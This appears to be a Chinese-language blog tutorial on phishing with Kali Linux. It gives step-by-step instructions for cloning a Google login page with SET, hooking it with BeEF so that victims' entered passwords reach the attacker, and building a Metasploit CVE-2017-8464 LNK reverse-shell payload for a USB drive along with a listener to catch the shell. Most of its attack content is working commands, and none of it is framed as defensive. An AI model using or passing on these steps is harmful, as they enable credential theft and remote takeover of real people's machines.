[Kali渗透]-钓鱼执法

一、setookit制作钓鱼页面

setookit简介

setookit,即社会工程学工具集Social-Engineer Toolkit,是一个为社会工程设计的开源渗透测试框架。

SET具有很多自定义攻击向量,可让你快速进行可信的攻击

项目地址:https://github.com/trustedsec/social-engineer-toolkit/

kali上自带可以直接使用,终端输入setookit

[Kali渗透]-钓鱼执法_第1张图片

制作钓鱼页面

1⃣️选1

[Kali渗透]-钓鱼执法_第2张图片

2⃣️选2

3⃣️选3

4⃣️选1

[Kali渗透]-钓鱼执法_第3张图片

5⃣️==选google模版,等待上线

二、钓鱼页面与beef-xss结合

1. 启动setookit构造钓鱼页面

依次按照如下顺序:1 ——> 2 ——> 3 ——> 1 ——> [自己kali的IP] ——> 2

2. 启动beef

1⃣️更新源

apt-get update

2⃣️下载及运行

beef-xss

3. 将HOOK代码嵌入钓鱼页面

vim ~/.set/web_clone/index.html

4. 通过社工让鱼儿访问我们的钓鱼页面

如果鱼儿输入账号密码就会将他们发送到我们的kali上

5. 回到kali查看效果

可以看到beef已经收到回连

三、利用USB社工钓鱼

1. 利用msf生成攻击向量

1⃣️打开终端输入

msfconsole

2⃣️继续输入

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

3⃣️

set payload windows/meterpreter/reverse_tcp

4⃣️

options

5⃣️

set lhost [自己kali的IP]

6⃣️

run

2. 将攻击向量放到USB中,并启动msf监听

1⃣️启动msf监听

use multi/handler

2⃣️

set payload windows/meterpreter/reverse_tcp

3⃣️

set lhost [自己kali的IP]

4⃣️

run

3. 打开USB,执行文件

你可能感兴趣的:(网络安全)